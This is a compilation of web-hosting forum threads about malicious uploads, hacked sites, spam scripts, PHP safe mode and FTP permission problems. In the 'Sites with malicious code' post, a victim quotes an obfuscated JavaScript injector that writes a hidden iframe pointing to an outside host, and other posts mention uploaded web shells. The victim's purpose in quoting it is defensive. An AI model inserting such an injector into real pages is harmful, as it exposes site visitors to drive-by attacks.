Stoping Malicious Files From Being Uploaded ( Cpanel)

Jun 27, 2009

I am wanting to know if there is a way to stop files being uploaded to my vps, via ftp cpanel etc that are malicious..

I have been told there is a way to do this but i havent been told how..

Basicaly i want to know if there is something where i can add a list of keywords that are in the malicious files and what ever it is will stop them from being uploaded or if they manage to get uploaded onto my vps will it make them not work?

I am looking into this as i had an issue before where someone uploaded a shell onto my server :@ luckily it didnt cause no damage or he didnt get anywhere but i still want to be safe.

View 5 Replies


Hacker Adds Malicious Code To All Html And Php Files

Apr 30, 2009

we have been having a strange hacking problem on our server that we can not seem to find how they are managing to accompish. I am just wondering if anyone here may be able to offer any suggestions on this?

The problem:

On our server, a hacker has managed to add malicious code to all html and php files on two hosting accounts that we operate. These two accounts are seperate and do not share login information. This is the 2nd time this has happened within the past two weeks.

Originally it was suspected that we needed to add SuPhp to prevent insecure permissions. This has been done, yet the problem continues.

On all html pages, malicious javascript has been added, and on all php files malicious php code has been added.

We have a lot of accounts on this server, and as mentioned only the two accounts seem to have been affected by this.

What we have done to attempt to secure the server:
1) We have installed SuPhp.

2) We have ensured that all scripts on the affected websites are updated and running the latest versions.

3) We have changed all the passwords.

Our server is a managed server, and our server company has been very helpful, however at the moment can not seem to pinpoint the problem. There also does not appear to be any indication via the access logs of the infected files being altered, yet they have been altered.

The computers used to access these websites are clean, and do not have any malware running, which would allow a hacker to obtain any passwords. It also does not appear that the hacker was able to obtain root access.

One other thing I noticed, we run Kayako on one of the sites. When this problem occurs we receive a message that Zend Optimizer is not installed on our server when attempting to login to Kayako, when in fact it is.

Searching Google, I found the following link on the Zend site in which the symptoms seem to be very similar. What are the odds this could be a Zend vulnerabilty?


View 14 Replies View Related

Filter Uploaded Files

Mar 5, 2008

I want to filter any files uploaded and i have put this line at php.ini
suhosin.upload.verification_script = /my path

But my problem till now i can not make this script. (Disable upload php files)

View 1 Replies View Related

Problem With Files Owned By 'nobody' When Uploaded

Aug 4, 2007

I used to have my apache 1.3.37 with PHP compiled as a CGI. Whenever i have a php script (say vbulletin forum software) that allow file uploads, files will be uploaded with the correct userid and groupid on the server. However, once i compiled PHP as ISAPI module, the files will be uploaded but will be owned by 'nobody'. Of course i can log in as root and chown it back to the right user, but it's a hassle if there are multiple user accounts on the server and they're using php software on their end. If someone is using an ftp program and tries to overwrite that uploaded file that's owned by nobody, it will not let them do so. Is there a way to fix this, or change the config files that would fix it?

View 3 Replies View Related

How To Find How And Who Uploaded Files- Spam - Action I Can Take

Mar 27, 2009

I have a dedicated server, the server itself is secure (as far as I know) and I run lots of my sites from it. I offered a friend hosting for his flash based chat application he built.

Today I was contacted by someone; "Are you the owner of" so I informed that yes, it was my server and they then showed me an email they'd received from my server. I did a search and apparently someone uploaded mail.php and a couple of files it was using to send out spam based upon a variety of conditions that the other files met. The files contained forenames and surnames, it'd use a forename and a surname then send it to popular free mail services. The email contained ramblings about new world order and promoted a website.

How can I find out how they got the files uploaded to the account and what action can I take? I checked the whois for the domain and have their contact information, however it's a large site so I'm doubtful that the owner did it. I don't want my servers IPs being blacklisted for spam :|

View 3 Replies View Related

Limit The Size Of Uploaded Files Using VSFTPD

May 26, 2007

I have a RHEL 4 plain server, and im using vsftpd server, i can not find an option to specify the max size for uploading files... does anybody know something about this?

View 1 Replies View Related

Files Uploaded Via Scripts & Joomla Have 600 Permissions

Jun 26, 2007

I've recently started experiencing some issues where files uploaded through Joomla or some other scripts (mostly PHP) inherit a permission of 600. Prior to updates being done on the server I'm hosted on, uploaded files received 644 permissions and all things worked great.

I've checked the umask that assigned to the shell (022) and have ruled out that as a problem.

View 7 Replies View Related

Plesk 11.x / Linux :: Can't See Files Which Are Uploaded With Script

Mar 1, 2014

I am using a upload script for my files. After upload i cant see them on ftp but can see on panel file manager.

View 9 Replies View Related

Apache :: Created FTP Account With Vsftp And Files Uploaded Are Not Readable

Jan 17, 2014

I created a FTP account with vsftp and files uploaded are not readable via www-data

View 1 Replies View Related

[newmailcgi] Recently Uploaded CGI Scripts On CPanel Server

Dec 11, 2007

Whenever someone uploads or re-uploads to my server a file relating to a CGI script that sends mail, I get an email with something like:


Note: If this is the first time you received this mail, it contains the history for the entire month so far.

Below are the recently upload scripts that contain code to send email. You may wish to inspect them to ensure they are not sending out SPAM.

/home/xxxxxxx/public_html/followup/send2.php:106: if($sc == "buchanan") {
/home/xxxxxxx/public_html/followup/send2.php:107: mail($email, $subject, $creative, $headers);
/home/xxxxxxx/public_html/followup/send2.php:108: }
/home/xxxxxxx/public_html/followup/send.php:100: if($sc == "buchanan") {
/home/xxxxxxx/public_html/followup/send.php:101: mail($email, $subject, $creative, $headers);
/home/xxxxxxx/public_html/followup/send.php:102: }

What steps can I take to actually inspect them to ensure they are not sending out SPAM?

View 2 Replies View Related

Cgi With Malicious Code

Jul 16, 2009

I have serious problems with ".cgi" with malicious code, with that the person who has these files to send spam through my server without any kind of block, could block this type of send SPAM with files ".cgi"?

CentOS 5.2 - 64bits


Exemplo of file executed: /usr/bin/perl /home/username/public_html/cgi-bin/erri/coms.cgi

View 5 Replies View Related

Malicious Javascript

Mar 18, 2009

We are having a problem with a number of our websites hosted on Fasthosts reseller account where JavaScript is being maliciously inserted into a number of pages.

An example of the code that has been inserted can be found below:
Which runs this script:
<script src=//></script>

New pages have been created on a number of websites aswell as the above code inserted into existing pages.

After removing the above code from one particular website it has happened again.
Some of the websites being affected are just static websites with only HTML pages, others are dynamic ASP pages.

View 2 Replies View Related

Mulcishell Malicious Script

May 11, 2009

Has anyone here ever heard of a malicious script called Mulcishell, stored in the file mshell.php? I've seen a bunch of instances of the file in my clients' folders with permissions 777, and I want to know what it does and how it works. (I already deleted the file, knowing it was a malicious script, but I want to know how to prevent it from ever being executed on my server.)

View 1 Replies View Related

Sites With Malicious Code

Oct 27, 2008

all sites in my server have maliciose code:

</html> <html> <body><script>var source ="=jgsbnf!tsd>(iuuq;00iv2.iv2/do0dpvoufs0joefy/qiq(!xjeui>2!ifjhiu>2!gsbnfcpsefs>1?=0jgsbnf?"; var result = "";
for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
document.write(result); </script>
</html> </body>

how to localize this code in my sites, using grep.

My server work in centos.

View 3 Replies View Related

Malicious Mail Sent Out Via MailEnable On Localhost

Jun 5, 2008

we received a report of a malicious mail being sent from our servers. Problem is that the sender and recipients are not hosted with us. What I'm trying to find out is how the mail got sent out. The ME logs shows that the connection was made from to the smtp service, but that's it.

We don't run mail services (pop3/imap/webmail) on the web servers, if that helps any. Have run out of ideas after sifting thru lots of logs (was trying to find if anyone called an application to send the mail and attachments out), but came up empty.

View 7 Replies View Related

Malicious Code Added To Index File

Jul 9, 2008

I've been having an issue with one of my sites were someone has been adding malicious code to the index file. I don't know what has been compromised and am looking for a way to stop this.

I have a dedicated server have already upgraded MySQL to the latest version as I though that might work but it hasn't.

View 8 Replies View Related

Google Shows Tha My Site Has Malicious Code And Blocked Me

Apr 5, 2009

for the first time in my sites life(10 year site) google blocked it. when you type my site google says that my site has malicious code in we find it the problem in my site came from the company where i hosted it.we clear all the files for the malicious code and now its all ok.i want to ask if anyone knows for his experience how much days google will check my site again to see if all its ok.i send them before six hours via webmaster tools, a request for eaming agin my site,but i dont knwo how will do these. so i am asking anyone of you,who had same experience.any help will be appreciate.please help me with anything you think that might be useful for me to having my site back again in google correctly!

View 5 Replies View Related

Stop Exploits And Malicious Execs: Safe Mode

Mar 8, 2008

I decided to apply PHP safe mode to my servers, considering:

- I cannot prohibit using exec functions (some binary uses are needed, like host, mysqldump, etc..)

- I cannot restrict at all via UID/GID method at bins due to several problems..

Safe mode is the final sollution, as I only need "safe_mode_exec_dir" config to set a folder with the necesary binaries... this will stop nobody user (Apache) to exec whatever it wants, like perl, binaries uploaded to an public insecure folder (exploits), or anything else... people only could exec() the binaries I want and where I want. This will stop finally 95% of my hack problems.

Well. The problem is safe_mode is enabled or not, but you cannot set o disable certain features of this safe mode, like UID/GID checks (*******!)...

I am trying to configure so only "safe_mode_exec_dir" would apply, so:

- Including UIDs checks disabled by:
safe_mode_include_dir = "/home/"

- Some variables set to NULL, as safe_mode_allowed_env_vars or safe_mode_protected_env_vars...

- safe_mode_exec_dir = "/usr/phpbin/"
Great! with symbolic lynks in... the best sollution available for me.

- open_basedir = "/home/"
(for fopen, etc...)

Ok ok.. but problems there.. by example this one:


Warning: fopen() [function.fopen]: SAFE MODE Restriction in effect. The script whose uid is 32015 is not allowed to access cache/dynamic_fields/modules.php owned by uid 99 in /home/yyyyyyyyy/public_html/chn/modules/DynamicFields/DynamicField.php on line 823

Great.. fopen is under UID/GID checks, but it is not an include, so safe_mode_include_dir would not apply...

Now fopen, link, unlink, etc.. functions are UID restricted and this seems to be impossible to disable.... pffffffff...

can you share your safe_mode configs or sollutions for this problem?

View 2 Replies View Related

FTP - Uploaded File Not Overwriting

Jan 5, 2008

Does anybody understand what is going on here?

Here is the problem:

I log in to FTP and I try and upload an updated file (the file already exists on server). It prompts me to overwrite and I say yes but when I refresh/check the site the page hasnt changed - I then tried uploading the file again and it still says the existing file size (so I know it hasnt been replace).

Any idea why it it not overwriting?

The files are CHOWNed my the owner (FTP user) which is myself.

View 11 Replies View Related

Uploaded File Size 0 KB

Feb 2, 2008

I uploaded my file to web server(html, image file and css file), but strangely after uploaded it to server all file that I uploaded size 0 KB. I uploaded it using WS FTP.

Is there something wrong the way I uploaded it.

View 2 Replies View Related

Someones Uploaded A Phishing Site

Jul 31, 2007

Someones managed to upload a phishing site to my VPS.

How do they normally achieve this, there has been no unauthorised root access as I get e-mail each time someone log in as root.

Is it likely they've just managed to guess my ftp password, or is it going to have something to do with a script running elsewhere?

I've got solarvps looking at it now.

View 14 Replies View Related

Shell Uploaded - Site Hacked - How To Trace ?

Nov 6, 2008

Shell uploaded - Site hacked - How to trace?

Many of my customers let me know that their websites had been hacked. I think it comes from local hacker ....

View 7 Replies View Related

How Many Websites Can Be Uploaded To One Single Webspace Account

Oct 20, 2008

How many websites can be uploaded to one single webspace account

View 9 Replies View Related

Apache :: How To Discover Which Php File Allows Malicious File Upload

Oct 10, 2014

i manage linux apache webserver with a few wordpress blogs and from time to time i see someone inject a malicious .php file into wp-content/uploads/2014/10/ directory.

i think its some bad plugin or theme, but these is more blogs, i ugrade, update, WP, but

how can i setup some monitor to tell me which php file (or even line in php file) injected that malicious .php ? I have linux root access so i can setup anything 

View 3 Replies View Related

CPanel/moving Files

Jan 28, 2007

I have about 20 gigs of pictures that I have already uploaded to my server, but they're just sitting there in a directory listing tree.

How can I import all of those pictures into, say Coppermine or 4images or the like, without having to do each one manually?

View 2 Replies View Related

Can't Delete Files From CPanel Server

May 11, 2007

I've been using CPanel for a few years now and I've encountered an error that I have no clue how to fix it. Basically the files have been with me for the last two or three years and I've changed them from server to server. I'd say these files have been through about four or five servers. The funny thing is I can't delete any of these files. The files are in a folder under public_html and I can't delete the folder or any of the files or folders inside of that folder. I've tried through FTP and through CPanel.

The FTP error I get (I'm using WS_FTP Pro) is:

# transferred 4277 bytes in 0.063 seconds, 534.625 Kbps ( 66.828 Kbps), transfer succeeded.
226-Options: -a -l
226 58

The CPanel error I get (through File Manager) is:

[a fatal error or timeout occurred while processing this directive]

and under the trash can in File Manager:

Unable to change directory to /home/mydirectory/.trash! You do not seem to have access permissions! (System Error: Permission denied)

I even CHMODed all of the files to 777. I don't know how to get rid of these old files, how do I do it? I also have root to the server if that helps.

View 3 Replies View Related

Copyrights 2005-15, All rights reserved